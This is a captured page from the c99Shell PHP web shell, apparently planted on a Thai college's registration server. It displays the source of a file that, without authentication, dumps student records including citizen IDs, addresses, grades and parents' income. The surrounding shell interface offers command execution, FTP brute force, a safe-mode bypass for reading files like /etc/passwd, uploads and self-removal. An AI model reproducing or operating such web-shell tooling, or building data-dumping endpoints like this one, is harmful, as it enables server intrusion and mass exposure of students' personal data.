!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eregis/   drwxr-xr-x
Free 51.24 GB of 127.8 GB (40.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     misGetData.php (16.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    
/* Database info 
        $DBHOST ;
        $DBUSER_EREGIS ;
        $DBPASS_EREGIS ;
        $DBNAME_EREGIS ;
    */
    
ini_set('include_path','/var/www/sekret:.');
    include_once(
"eregis.inc");

    
/* Connect */
    
$link mysql_connect($DBHOST$DBUSER_EREGIS$DBPASS_EREGIS);
    
mysql_select_db($DBNAME_EREGIS$link);
    
mysql_query("SET NAMES UTF8");

// ----------------------------

$collegeCode $_GET["clg_code"];
$table $_GET["tb"];
$row $_GET["row"];

if(isset(
$table) && isset($collegeCode)){
if(
$table==0){

    
$sql "SELECT * FROM rg_TermConfig WHERE '".date('Y-m-d')."' BETWEEN tmcFrDate AND tmcToDate";
    
$result mysql_query($sql$link);
    
$row mysql_fetch_object($result);

    
$xml='<?xml version="1.0" encoding="UTF-8" ?>';
    
$xml.="<acadyear nrow=\"$acadYear\">".$row->tmcAcY."</acadyear>";
    echo 
$xml;

}elseif(
$table==1){

    if(
$row>0){
        
$offset 500*$row-500 ;
        
$row_count 500 ;
        
$limit "LIMIT $offset , $row_count";
    }else{
        
$limit '';
    }

    
$sql "SELECT * ,
            CONCAT(YEAR(stdAdmitDate)+543,'-',MONTH(stdAdmitDate),'-',DAY(stdAdmitDate)) AS admitDate ,
            CONCAT(YEAR(stdGraduateDate)+543,'-',MONTH(stdGraduateDate),'-',DAY(stdGraduateDate)) AS finishDate 
            FROM rg_Student 
            LEFT JOIN rg_StudentDetails ON sdtStdId = stdId
            LEFT JOIN rg_StudentEduHis ON sehStdId = stdId
            LEFT JOIN rg_Adviser ON advStdId = stdId AND advSyId = stdSyId
            WHERE 1=1 GROUP BY stdId $limit "
;
    
$result mysql_query($sql$link);
    
$numrow mysql_num_rows($result);

    
$i 0;
    if(
$row==0){
        
$xml_r='<?xml version="1.0" encoding="UTF-8" ?>';
        
$xml_r.="<studentmaster nrow=\"$numrow\" >$numrow";
        
$xml_r.="</studentmaster>";
    }else{
        
$xml '';
        
$i_row=0;
        while(
$oSm mysql_fetch_object($result)) {
            
$i_row++;
            
$xml.="<std>";
                
$xml.="<collegeCode>".chk$collegeCode )."</collegeCode>";
                
$xml.="<studentId>".chk$oSm->stdId )."</studentId>";
                
$xml.="<studentCode>".chk$oSm->stdCode )."</studentCode>";
                
$xml.="<levelId>".chk$oSm->sehElvId )."</levelId>";
                
$xml.="<programId>".chk$oSm->stdCurId )."</programId>";
                
$xml.="<prefixId>".chk$oSm->stdPfId )."</prefixId>";
                
$xml.="<studentName>".chk$oSm->stdName )."</studentName>"
                
$xml.="<studentSurname>".chk$oSm->stdSurname )."</studentSurname>";
                
$xml.="<studentNameEng>".chk$oSm->stdNameE )."</studentNameEng>";
                
$xml.="<studentSurnameEng>".chk$oSm->stdSurnameE )."</studentSurnameEng>";
                
$xml.="<creditAttempt>".chk$oSm->stdCreditAttempt )."</creditAttempt>";
                
$xml.="<creditSatisfy>".chk$oSm->stdCreditSatisfy )."</creditSatisfy>";
                
$xml.="<GPA>".chk$oSm->stdGPA )."</GPA>";
                
$xml.="<admitAcadYear>".chk$oSm->stdAdY )."</admitAcadYear>";
                
$xml.="<admitSemester>".chk$oSm->stdTmIdAdmit )."</admitSemester>";
                
$xml.="<admitDate>".chk$oSm->admitDate )."</admitDate>";
                
$xml.="<finishDate>".chk$oSm->finishDate )."</finishDate>";
                
$xml.="<studentPassword>".chk'' )."</studentPassword>";
                
$xml.="<studentEmail>".chk$oSm->sdtEmail )."</studentEmail>";
                
$xml.="<studentYear>".chk$oSm->stdSyId )."</studentYear>";
                
$xml.="<studentStatus>".chk$oSm->stdSstId )."</studentStatus>";
                
$xml.="<officerId1>".chk$oSm->advPrsId )."</officerId1>";
                
$xml.="<officerId2>".chk'' )."</officerId2>";
                
$xml.="<financeStatus>".chk$oSm->stdFsId )."</financeStatus>";
                
$xml.="<updateUserId>".chk$oSm->stdUpdateUsLogin )."</updateUserId>";
                
$xml.="<updateDateTime>".chk$oSm->stdUpdateDate )."</updateDateTime>";
                
$xml.="<citizenId>".chk$oSm->sdtCitizenId )."</citizenId>";
                
$xml.="<graduateYear>".chk$oSm->stdGraduateY )."</graduateYear>";
                
$xml.="<genStatus>".chk$oSm->stdGenStatus )."</genStatus>";
                
$xml.="<genNo>".chk$oSm->stdGenId )."</genNo>";
                
$xml.="<entryTypeId>".chk$oSm->stdEtId )."</entryTypeId>";
                
$xml.="<entryTypeId2>".chk$oSm->stdEt2Id )."</entryTypeId2>";
                
$xml.="<studentSex>".chk$oSm->sdtSex )."</studentSex>";
                
$xml.="<scholarId>".chk$oSm->stdSoId )."</scholarId>";
                
$xml.="<preAdmitPositionId>".chk$oSm->stdPaId )."</preAdmitPositionId>";
                
$xml.="<totalPoint>".chk$oSm->stdTotalPoint )."</totalPoint>";
                
$xml.="<honor>".chk$oSm->stdHonor )."</honor>";
                
$xml.="<medal>".chk$oSm->stdMedal )."</medal>";
                
$xml.="<exitExam>".chk$oSm->stdExitExam )."</exitExam>";
                
$xml.="<studentStatusTmp>".chk$oSm->stdSstIdTmp )."</studentStatusTmp>";
            
$xml.="</std>";
            
$i++;
        }
        
$xml_r='<?xml version="1.0" encoding="UTF-8" ?>';
        
$xml_r.="<studentmaster nrow=\"$i_row\" >";
        
$xml_r.=$xml;
        
$xml_r.="</studentmaster>";
    }
    echo 
$xml_r;
}elseif(
$table==2){

    if(
$row!=0){
        
$offset = (500*$row)-500 ;
        
$row_count 500;
        
$limit "LIMIT $offset , $row_count";
    }else{
        
$limit '';
    }

    
$sql "SELECT * 
            ,CONCAT(YEAR(sdtBirthDate)+543,'-',MONTH(sdtBirthDate),'-',DAY(sdtBirthDate)) AS birthDate 
            FROM rg_StudentDetails 
            LEFT JOIN rg_Student ON sdtStdId = stdId
            WHERE 1=1 $limit "
;
    
$result mysql_query($sql$link);
    
$numrow mysql_num_rows($result);

    
$i 0;
    if(
$row==0){
        
$xml_r='<?xml version="1.0" encoding="UTF-8" ?>';
        
$xml_r.="<studentbio nrow=\"$numrow\" >$numrow";
        
$xml_r.="</studentbio>";
    }else{
        
$xml '';
        
$i_row=0;
        
$txt '';
        while(
$oSb mysql_fetch_object($result)){
            
$i_row++;
            
$xml.="<std>";
            
$xml.="<collegeCode>".chk$collegeCode )."</collegeCode>";
            
$xml.="<studentId>".chk$oSb->sdtStdId )."</studentId>";
            
$xml.="<nationId>".chk$oSb->sdtNtId )."</nationId>";
            
$xml.="<religionId>".chk$oSb->sdtRlgId )."</religionId>";
            
$xml.="<bloodGroup>".chk$oSb->sdtBloodGroup )."</bloodGroup>";
            
$xml.="<birthDate>".chk$oSb->birthDate )."</birthDate>";
            
$xml.="<birthProvinceId>".chk$oSb->sdtPrvIdBirth )."</birthProvinceId>";
            
$xml.="<homeAddress>".chk$oSb->sdtHomeAddr )."</homeAddress>";
            
$xml.="<homeDistrictId>".chk$oSb->sdtDtIdHome )."</homeDistrictId>";
            
$xml.="<homeAmphurId>".chk$oSb->sdtApIdHome )."</homeAmphurId>";
            
$xml.="<homeProvinceId>".chk$oSb->sdtPrvIdHome )."</homeProvinceId>";
            
$xml.="<homeZipcode>".chk$oSb->sdtHomePostCode )."</homeZipcode>";
            
$xml.="<homePhoneNo>".chk$oSb->sdtHomePhoneNo )."</homePhoneNo>";
            
$xml.="<officeName>".chk$oSb->sdtWorkName )."</officeName>";
            
$xml.="<officeAddress>".chk$oSb->sdtWorkAddr )."</officeAddress>";
            
$xml.="<officeDistrictId>".chk$oSb->sdtDtIdWork )."</officeDistrictId>";
            
$xml.="<officeAmphurId>".chk$oSb->sdtApIdWork )."</officeAmphurId>";
            
$xml.="<officeProvinceId>".chk$oSb->sdtPrvIdWork )."</officeProvinceId>";
            
$xml.="<officeZipcode>".chk$oSb->sdtWorkPostCode )."</officeZipcode>";
            
$xml.="<officePhoneNo>".chk$oSb->sdtWorkPhoneNo )."</officePhoneNo>";
            
$xml.="<workingStatus>".chk$oSb->sdtWorkStatus )."</workingStatus>";
            
$xml.="<workingPosition>".chk$oSb->sdtWorkPosition )."</workingPosition>";
            
$xml.="<workingSalary>".chk$oSb->sdtWorkSalary )."</workingSalary>";
            
$xml.="<fatherName>".chk$oSb->sdtFatherName )."</fatherName>";
            
$xml.="<fatherAddress>".chk$oSb->sdtFatherAddr )."</fatherAddress>";
            
$xml.="<fatherDistrictId>".chk$oSb->sdtDtIdFather )."</fatherDistrictId>";
            
$xml.="<fatherAmphurId>".chk$oSb->sdtApIdFather )."</fatherAmphurId>";
            
$xml.="<fatherProvinceId>".chk$oSb->sdtPrvIdFather )."</fatherProvinceId>";
            
$xml.="<fatherZipcode>".chk$oSb->sdtFatherPostCode )."</fatherZipcode>";
            
$xml.="<fatherPhoneNo>".chk$oSb->sdtFatherPhoneNo )."</fatherPhoneNo>";
            
$xml.="<fatherOccupation>".chk$oSb->sdtFatherOccupation )."</fatherOccupation>";
            
$xml.="<fatherStatus>".chk$oSb->sdtFatherStatus )."</fatherStatus>";
            
$xml.="<motherName>".chk$oSb->sdtMotherName )."</motherName>";
            
$xml.="<motherAddress>".chk$oSb->sdtMotherAddr )."</motherAddress>";
            
$xml.="<motherDistrictId>".chk$oSb->sdtDtIdMother )."</motherDistrictId>";
            
$xml.="<motherAmphurId>".chk$oSb->sdtApIdMother )."</motherAmphurId>";
            
$xml.="<motherProvinceId>".chk$oSb->sdtPrvIdMother )."</motherProvinceId>";
            
$xml.="<motherZipcode>".chk$oSb->sdtMotherPostCode )."</motherZipcode>";
            
$xml.="<motherPhoneNo>".chk$oSb->sdtMotherPhoneNo )."</motherPhoneNo>";
            
$xml.="<motherOccupation>".chk$oSb->sdtMotherOccupation )."</motherOccupation>";
            
$xml.="<motherStatus>".chk$oSb->sdtMotherStatus )."</motherStatus>";
            
$xml.="<studentSex>".chk$oSb->sdtSex )."</studentSex>";
            
$xml.="<parentName>".chk$oSb->sdtParentName )."</parentName>";
            
$xml.="<parentRelation>".chk$oSb->sdtParentRelationship )."</parentRelation>";
            
$xml.="<parentAddress>".chk$oSb->sdtParentAddr )."</parentAddress>";
            
$xml.="<parentDistrictId>".chk$oSb->sdtDtIdParent )."</parentDistrictId>";
            
$xml.="<parentAmphurId>".chk$oSb->sdtApIdParent )."</parentAmphurId>";
            
$xml.="<parentProvinceId>".chk$oSb->sdtPrvIdParent )."</parentProvinceId>";
            
$xml.="<parentZipcode>".chk$oSb->sdtParentPostCode )."</parentZipcode>";
            
$xml.="<parentPhoneNo>".chk$oSb->sdtParentPhoneNo )."</parentPhoneNo>";
            
$xml.="<parentMobile>".chk$oSb->sdtParentMobileNo )."</parentMobile>";
            
$xml.="<parentOcc>".chk$oSb->sdtParentOccupation )."</parentOcc>";
            
$xml.="<parentIncome>".chk$oSb->sdtParentIncome )."</parentIncome>";
            
$xml.="<parentEmail>".chk$oSb->sdtParentEmail )."</parentEmail>";
            
$xml.="<contactPerson>".chk$oSb->sdtContactName )."</contactPerson>";
            
$xml.="<contactAddress>".chk$oSb->sdtContactAddr )."</contactAddress>";
            
$xml.="<contactDistrictId>".chk$oSb->sdtDtIdContact )."</contactDistrictId>";
            
$xml.="<contactAmphurId>".chk$oSb->sdtApIdContact )."</contactAmphurId>";
            
$xml.="<contactProvinceId>".chk$oSb->sdtPrvIdContact )."</contactProvinceId>";
            
$xml.="<contactZipcode>".chk$oSb->sdtContactPostCode )."</contactZipcode>";
            
$xml.="<contactPhoneNo>".chk$oSb->sdtContactPhoneNo )."</contactPhoneNo>";
            
$xml.="<cardExpiryDate>".chk$oSb->sdtCardExpireDate )."</cardExpiryDate>";
            
$xml.="<currentAddress>".chk($oSb->sdtCurrentAddr)."</currentAddress>";
            
$xml.="<currentDistrictId>".chk$oSb->sdtDtIdCurrent )."</currentDistrictId>";
            
$xml.="<currentAmphurId>".chk$oSb->sdtApIdCurrent )."</currentAmphurId>";
            
$xml.="<currentProvinceId>".chk$oSb->sdtPrvIdCurrent )."</currentProvinceId>";
            
$xml.="<currentZipcode>".chk$oSb->sdtCurrentPostCode )."</currentZipcode>";
            
$xml.="<currentPhoneNo>".chk$oSb->sdtCurrentPhoneNo )."</currentPhoneNo>";
            
$xml.="<graduateAddress>".chk$oSb->sdtGraduateAddr )."</graduateAddress>";
            
$xml.="<graduateDistrictId>".chk$oSb->sdtDtIdGraduate )."</graduateDistrictId>";
            
$xml.="<graduateAmphurId>".chk$oSb->sdtApIdGraduate )."</graduateAmphurId>";
            
$xml.="<graduateProvinceId>".chk$oSb->sdtPrvIdGraduate )."</graduateProvinceId>";
            
$xml.="<graduateZipcode>".chk$oSb->sdtGraduatePostCode )."</graduateZipcode>";
            
$xml.="<graduatePhoneNo>".chk$oSb->sdtGraduatePhoneNo )."</graduatePhoneNo>";
            
$xml.="<maritalStatusId>".chk$oSb->sdtMsId )."</maritalStatusId>";
            
$xml.="<weight>".chk$oSb->sdtWeight )."</weight>";
            
$xml.="<height>".chk$oSb->sdtHeight )."</height>";
            
$xml.="<picturePath>".chk$oSb->sdtPicturePath )."</picturePath>";
            
$xml.="<recruitmentTypeId>".chk$oSb->sdtRtId )."</recruitmentTypeId>";
            
$xml.="<occExamResult>".chk$oSb->sdtOccExamResult )."</occExamResult>";
            
$xml.="<canRefund>".chk$oSb->sdtCanRefund )."</canRefund>";
            
$xml.="<oldStudentName>".chk$oSb->sdtOldName )."</oldStudentName>";
            
$xml.="<entryDegree>".chk$oSb->sdtEdgIdPre )."</entryDegree>";
            
$xml.="<healthPrivId>".chk$oSb->sdtHpId )."`</healthPrivId>";
            
$xml.="</std>";
            
$i++;
        }
// END LOOP
        
$xml_r='<?xml version="1.0" encoding="UTF-8" ?>';
        
$xml_r.="<studentbio nrow=\"$i_row\" >";
        
$xml_r.=$xml;
        
$xml_r.="</studentbio>";
    } 
// END if row!=0
    
echo $xml_r;

}elseif(
$table==3){
    if(
$row!=0){
        
$offset = (500*$row)-500 ;
        
$row_count 500;
        
$limit "LIMIT $offset , $row_count";
    }else{
        
$limit '';
    }

    
$sql "SELECT * FROM rg_StudentSummary 
            WHERE 1=1 $limit "
;
    
$result mysql_query($sql$link);
    
$numrow mysql_num_rows($result);

    
$i 0;
    if(
$row==0){
        
$xml_r='<?xml version="1.0" encoding="UTF-8" ?>';
        
$xml_r.="<studentstatus nrow=\"$numrow\" >$numrow";
        
$xml_r.="</studentstatus>";
    }else{
        
$xml '';
        
$i_row=0;
        while(
$oSs mysql_fetch_object($result)){
            
$i_row++;
            
$xml.="<std>";
            
$xml.="<collegeCode>".chk$collegeCode )."</collegeCode>";
            
$xml.="<studentId>".chk$oSs->ssmStdId )."</studentId>";
            
$xml.="<acadYear>".chk$oSs->ssmAcY )."</acadYear>";
            
$xml.="<semester>".chk$oSs->ssmTmId )."</semester>";
            
$xml.="<studentStatus>".chk$oSs->ssmSstId )."</studentStatus>";
            
$xml.="<GPA>".chk$oSs->ssmGPA )."</GPA>";
            
$xml.="<creditAttempt>".chk$oSs->ssmCreditAttempt )."</creditAttempt>";
            
$xml.="<creditSatisfy>".chk$oSs->ssmCreditSatisfy )."</creditSatisfy>";
            
$xml.="<creditPoint>".chk$oSs->ssmCreditPoint )."</creditPoint>";
            
$xml.="<GPAX>".chk$oSs->ssmGPAX )."</GPAX>";
            
$xml.="<sumCreditAttempt>".chk$oSs->ssmSumCreditAttempt )."</sumCreditAttempt>";
            
$xml.="<sumCreditSatisfy>".chk$oSs->ssmSumCreditSatisfy )."</sumCreditSatisfy>";
            
$xml.="<sumCreditPoint>".chk$oSs->ssmSumCreditPoint )."</sumCreditPoint>";
            
$xml.="<createDateTime>".chk$oSs->ssmCreateDate )."</createDateTime>";
            
$xml.="<createUserId>".chk$oSs->ssmCreateUserId )."</createUserId>";
            
$xml.="<updateDateTime>".chk$oSs->ssmUpdateDate )."</updateDateTime>";
            
$xml.="<updateUserId>".chk$oSs->ssmUpdateUserId )."</updateUserId>";
            
$xml.="<approveSpe>".chk$oSs->ssmSstIdApproveSpe )."</approveSpe>";
            
$xml.="<approver>".chk$oSs->ssmApprover )."</approver>";
            
$xml.="<refNo>".chk$oSs->ssmRefNo)."</refNo>";
            
$xml.="<approveDate>".chk$oSs->ssmApproveDate )."</approveDate>";
            
$xml.="<passStatus>".chk$oSs->ssmPassStatus )."</passStatus>";
            
$xml.="<syId>".chk$oSs->ssmSyId )."</syId>";
            
$xml.="</std>";
            
$i++;
        }
//--end loop
        
$xml_r='<?xml version="1.0" encoding="UTF-8" ?>';
        
$xml_r.="<studentstatus nrow=\"$i_row\" >";
        
$xml_r.=$xml;
        
$xml_r.="</studentstatus>";
    }
    echo 
$xml_r;
}
// End if table
}

function 
chk($field){
    
//htmlspecialchars   htmlentities
    
$value = ($field !='')? htmlspecialchars($fieldENT_QUOTES) : 'NULL';
    return 
$value;
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0152 ]--